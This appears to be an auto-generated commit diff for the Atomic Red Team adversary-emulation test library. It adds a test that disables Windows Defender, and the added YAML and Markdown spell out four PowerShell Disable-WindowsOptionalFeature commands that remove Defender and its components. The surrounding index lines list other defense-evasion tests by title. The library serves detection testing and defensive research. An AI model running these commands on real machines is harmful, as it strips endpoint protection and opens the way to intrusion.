Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -321,6 +321,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,32,LockBit Black - Disable Pri
 defense-evasion,T1562.001,Disable or Modify Tools,33,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
 defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -241,6 +241,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,32,LockBit Black - Disable Pri
 defense-evasion,T1562.001,Disable or Modify Tools,33,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
 defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -459,6 +459,7 @@
   - Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
   - Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
   - Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
+  - Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -350,6 +350,7 @@
   - Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
   - Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
   - Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
+  - Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -18020,6 +18020,25 @@ defense-evasion:
           Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
         name: powershell
         elevation_required: true
+    - name: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
+      auto_generated_guid: f542ffd3-37b4-4528-837f-682874faa012
+      description: "The following Atomic will attempt to disable Windows-Defender
+        using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment
+        Image Servicing and Management tool. \nSimilar to DISM.exe, this cmdlet is
+        used to enumerate, install, uninstall, configure, and update features and
+        packages in Windows images.\nA successful execution will not standard-out
+        any details. Remove the quiet switch if verbosity is needed.\nThis method
+        will remove Defender and it's packages.\nReference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
+          Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
+          Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
+          Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:

atomics/T1562.001/T1562.001.md

@@ -76,6 +76,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
 
 - [Atomic Test #35 - Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35---lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell)
 
+- [Atomic Test #36 - Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36---disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
+
 
 <br/>
 
@@ -1480,4 +1482,39 @@ Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #36 - Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
+The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. 
+Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
+A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
+This method will remove Defender and it's packages.
+Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f542ffd3-37b4-4528-837f-682874faa012
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
+Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
+Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
+Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
+```
+
+
+
+
+
+
 <br/>